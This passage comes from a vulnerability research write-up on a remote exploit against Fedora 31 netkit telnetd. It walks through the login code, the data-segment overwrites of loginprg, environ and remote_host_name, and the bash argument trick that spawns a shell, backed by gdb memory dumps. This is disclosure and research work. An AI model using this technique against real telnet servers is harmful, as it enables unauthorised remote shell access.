Executing the login process is done using the start_login function as seen below. On line 629 the global character pointer loginprg is used to determine what to execute. On the Fedora 31 build, this variable is far below ptyobuf on the data segment, and therefore we can write it.

The arguments passed to the command executed are not easily under our control, as they are constructed on the stack in argv_stuff using addarg. We note that on the default Fedora 31 build, what is executed use the following argv array:

argv[0] = loginprg;
argv[1] = "-h";
argv[2] = host;
argv[3] = "-p";
argv[4] = name;

Through the USER environment variable we have easy control over name, although it cannot start with a hyphen (this would be a security issue by itself). This variable can be set through TELOPT_ENVIRON or by corrupting the environ variable in the data segment. We can control host by overflowing remote_host_name. The “-h” parameter in bash does not take an argument, therefore host can be used to pass an additional parameter to bash. A good choice in this case is “-c” which will execute the command in name. This is because the ‘-h’ argument passed to bash will set the hashing_enabled flag, and the ‘-p’ argument will set the privileged_mode flag. The former flag is harmless, and the latter flag suppresses bash from changing the euid, which is convenient. Indeed, executing bash -h -c -p bash will spawn a new shell.

void start_login(const char *host, int autologin, const char *name) {
    struct argv_stuff avs;
    char *const *argvfoo;
    (void)autologin;

    initarg(&avs);

    /*
     * -h : pass on name of host.
     *          WARNING:  -h is accepted by login if and only if
     *                  getuid() == 0.
     * -p : don't clobber the environment (so terminal type stays set).
     *
     * -f : force this login, he has already been authenticated
     */
    addarg(&avs, loginprg);
    addarg(&avs, "-h");
    addarg(&avs, host);
#if !defined(NO_LOGIN_P)
    addarg(&avs, "-p");
#endif
#ifdef BFTPDAEMON
    /*
     * Are we working as the bftp daemon?  If so, then ask login
     * to start bftp instead of shell.
     */
    if (bftpd) {
        addarg(&avs, "-e");
        addarg(&avs, BFTPPATH);
    }
    else
#endif
    {
#if defined (SecurID)
        /*
         * don't worry about the -f that might get sent.
         * A -s is supposed to override it anyhow.
         */
        if (require_SecurID) addarg(&avs, "-s");
#endif
        if (*name=='-') {
            syslog(LOG_ERR, "Attempt to login with an option!");
            name = "";
        }
#if defined (AUTHENTICATE)
        if (auth_level >= 0 && autologin == AUTH_VALID) {
# if !defined(NO_LOGIN_F)
            addarg(&avs, "-f");
# endif
            addarg(&avs, name);
        }
        else
#endif
        {
            if (getenv("USER")) {
                addarg(&avs, getenv("USER"));
                if (*getenv("USER") == '-') {
                    write(1,"I don't hear you!\r\n",19);
                    syslog(LOG_ERR,"Attempt to login with an option!");
                    exit(1);
                }
            }
        }
    }
    closelog();
    /* execv() should really take char const* const *, but it can't */
    /*argvfoo = argv*/;
    memcpy(&argvfoo, &avs.argv, sizeof(argvfoo));
    execv(loginprg, argvfoo);

    syslog(LOG_ERR, "%s: %m\n", loginprg);
    fatalperror(net, loginprg);
}

3.5.1 Rewriting the data segment

As the data segment write primitive we have can only be used once, the easiest option is to write from loginprg all the way up to remote_host_name to get to the command execution outlined previously. This means that we will corrupt the variables on the data segment between loginprg and remote_host_name along the way. In order to avoid undesired side-effects, we have to inspect all variables we have overwritten for consistency. As this work is a proof-of-concept, we will set all memory values between loginprg and remote_host_name to 0, and have cherry-picked the ones that lead to undesired side-effects. This results in the list of values given below, where each entry will be handled specifically. Note that for more reliable exploitation we would have to exhaustively inspect all variables in this range.

(gdb) x/gx &loginprg
0xe0f8 <loginprg>:      0x000000000000a247
(gdb) x/wx &ptyslavefd
0xe2c8 <ptyslavefd>:    0xffffffff
(gdb) x/gx &environ
0xe700 <environ>:       0x0000000000000000
(gdb) x/gx &LastArgv
0x100c0 <LastArgv>:     0x0000000000000000
(gdb) x/64bx &remote_host_name 
0x10100 <remote_host_name>:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x10108 <remote_host_name+8>:   0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x10110 <remote_host_name+16>:  0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x10118 <remote_host_name+24>:  0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x10120 <remote_host_name+32>:  0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x10128 <remote_host_name+40>:  0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x10130 <remote_host_name+48>:  0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x10138 <remote_host_name+56>:  0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00

loginprg: overwritten to point to the command string to execute.
ptyslavefd: overwritten to the original value of ptyslavefd. If this value is incorrect, the login_tty function will call fatalperror.
environ: overwritten to make the getenv("USER") call work in start_login as we need to control the last argument to execv().
LastArgv: overwritten to make the setproctitle function work.
remote_host_name: overwritten with -c\0

One more part of this memory is used to contain a temporary scratch area that stores data we want to set pointers to. This includes the LastArgv and environ arrays, the strings inside of them, and the new value loginprg points to. There is not enough space to hold all the temporary data our exploit uses, but the variables that come after state_rcsid are not directly relevant to the code paths traversed in our exploit.

(gdb) x/56bx &state_rcsid
0xe140 <state_rcsid>:           0x24    0x49    0x64    0x3a    0x20    0x73    0x74    0x61
0xe148 <state_rcsid+8>:         0x74    0x65    0x2e    0x63    0x2c    0x76    0x20    0x31
0xe150 <state_rcsid+16>:        0x2e    0x31    0x32    0x20    0x31    0x39    0x39    0x39
0xe158 <state_rcsid+24>:        0x2f    0x31    0x32    0x2f    0x31    0x32    0x20    0x31
0xe160 <state_rcsid+32>:        0x39    0x3a    0x34    0x31    0x3a    0x34    0x34    0x20
0xe168 <state_rcsid+40>:        0x64    0x68    0x6f    0x6c    0x6c    0x61    0x6e    0x64
0xe170 <state_rcsid+48>:        0x20    0x45    0x78    0x70    0x20    0x24    0x00    0x00

4 Conclusion

We have presented a working exploit against Fedora 31 netkit-telnet-0.17 telnetd. Mitigations such as ASLR and PIE have been bypassed by using the bug primitive to create an information leak. Mitigations such as non-executable pages, and theoretically CFI have been bypassed by attacking metadata to change the executable that telnetd executes to log the remote user into the system.

SELinux has not been bypassed, as the current SELinux profile will not allow in.telnetd to execute anything else than the login_exec_t type. This means it is useless to change loginprg to anything that does not belong to this type. One idea would be to see if we can change arguments passed to loginprg to add a -f flag. Another idea is trying to gain full control over the execution path in order to pass arbitrary arguments to the execv call. Both of these ideas need more flexible information leaks and write primitives. We have verified at least a more flexible information leak exists that will disclose more of the data segment, but information leaks and write primitives that can write to arbitrary address in memory have not yet been pursued. We will leave this as future work to others.

Finally I would like to extend my personal gratitude to everyone that has proof-read this document and added suggestions and corrections. Most of you do not want to be named, but it should be known that your efforts were appreciated. Thank you.

Friday, February 28, 2020

BraveStarr – A Fedora 31 netkit telnetd remote exploit